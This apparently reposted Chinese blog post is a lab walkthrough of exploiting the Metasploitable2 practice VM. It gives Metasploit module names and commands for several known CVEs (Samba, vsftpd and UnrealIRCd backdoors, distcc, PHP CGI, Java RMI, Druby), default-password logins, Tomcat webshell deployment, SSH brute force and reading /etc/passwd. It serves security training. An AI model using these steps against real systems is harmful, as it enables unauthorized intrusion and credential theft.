Metasploitable2 靶机漏洞实验

版权声明:我的Github博客:https://wintrysec.github.io https://blog.csdn.net/qq_35553433/article/details/86598027

首先输入用户名和密码进入靶机系统:msfadmin     msfadmin

查询靶机IP:ifconfig       ==192.168.1.113

MySQL弱口令:

mysql -h 192.168.1.113  -u  root

成功进入MySQL数据库。

VNC弱口令:

vncviewer 192.168.1.113  输入密码:password  成功进入

Samba  MS-RPC Shell 注入漏洞:

安全组织索引

CVE:CVE-2007-2447

BID:BID-23972

OSVDB:OSVDB-34700

 原理:

Samba 中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。

如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的 MS-RPC 调用提交了恶意输入的话,就可能允许攻击者以nobody用户权限执行任意命令。

利用步骤:

  1. 启动metasploit
  2. use exploit/multi/samba/usermap_script ,选择漏洞
  3. set RHOST IP ,设置目标主机IP
  4. exploit 开始攻击
  5. 利用成功,用uname -a 验证

Vsftpd源码包后门漏洞

安全组织索引

BID-48539

OSVDB-73573

原理:

在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

利用步骤:

  1. 启动metasploit
  2. use exploit/unix/ftp/vsftpd_234_backdoor ,选择漏洞
  3. set RHOST IP ,设置目标主机IP
  4. expliot 开始攻击
  5. uname -a 验证

UnrealIRCd后门漏洞

安全组织索引

CVE-2010-2075

BID-40820

OSVDB-65445

原理:

在2009年11月到2010年6月间,分布于某些镜面站点的UnrealIRCd,

在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。

利用步骤:

  1. 启动metasploit
  2. use exploit/unix/irc/unreal_ircd_3281_backdoor
  3. set RHOST IP
  4. exploit
  5. uname -a

Java RMI SERVER 命令执行漏洞

安全组织索引

OSVDB-17535

原理:

Java RMI SERVER 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,导致代码执行。

利用步骤:

  1. nmap -p0-65535 IP ,查看1099端口是否开启
  2. use exploit/multi/misc/java_rmi_server
  3. set RHOST IP
  4. exploit
  5. shell(进入meterpreter 时执行)

Tomcat管理台默认口令漏洞

  1. 访问IP:8081找到管理后台,用tomcat/tomcat登录
  2. 用jar-cvf将jsp webshell打包为*.war
  3. 通过tomcat管理台的deploy刚才打包的*.war
  4. 访问webshell

root用户弱口令(SSH爆破)

  1. nmap -sV -O IP ,查看SSH端口是否打开
  2. 启动metasploit
  3. use auxiliary/scanner/ssh/ssh_login
  4. set RHOST IP
  5. set USERNAME root
  6. set PASS_FILE /tmp/r00t/pass.txt(字典文件,预先备好)
  7. set THREADS 50
  8. run
  9. ssh root@IP 登录

Distcc后门漏洞

安全组织索引

CVE-2004-2678

OSVDB-13378

原理:

Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,

该漏洞是Xcode 1.5版本及其他版本的 distcc 2.x版本配置对于服务器端口的访问不限制

利用步骤:

  1. 启动metasploit
  2. use exploit/unix/misc/distcc_exec
  3. set RHOST IP
  4. exploit
  5. id 查看权限 uname -a 验证

Samba sysmlink 默认配置目录遍历漏洞

安全组织索引

CVE-2010-0926

BID-33598

OSVDB-62145

原理:

Samba 是一套实现SMB(server message block)协议,跨平台进行文件共享和打印共享服务的程序

samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称名,

创建一个包含..的目录遍历符的软连接,可以进行目录遍历及访问任意文件

利用步骤:

  1. 启动metasploit
  2. use auxiliary/admin/smb/samba_sysmlink_traversal
  3. set RHOST IP
  4. set SMBSHARE tmp 设置SAM可写文件
  5. exploit
  6. smbclient//IP/tmp 在新窗口下打开上面生成的共享目录
  7. cd rootfs
  8. ls
  9. more /etc/passwd

PHP CGI 参数注入执行漏洞

安全组织索引

CVE-2012-1823

OSVDB-81633

原理:

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

利用步骤:

  1. 启动metasploit
  2. use exploit/multi/http/php_cgi_arg_injection
  3. set RHOST IP
  4. exploit
  5. ls 查看

Druby 远程代码执行漏洞

原理:

Druby配置不当,被滥用执行命令

利用步骤:

  1. nmap -p0-65535 -sS -sV IP 或者 nmap -bqv IP
  2. 启动metasploit
  3. 发现8787 Druby端口
  4. search drb 搜索drb相关漏洞
  5. use exploit/linux/misc/drb_remote_codeexec
  6. set URL druby:IP:8787 ,设置目标druby链接
  7. exploit
  8. id,uname -a

猜你喜欢

转载自blog.csdn.net/qq_35553433/article/details/86598027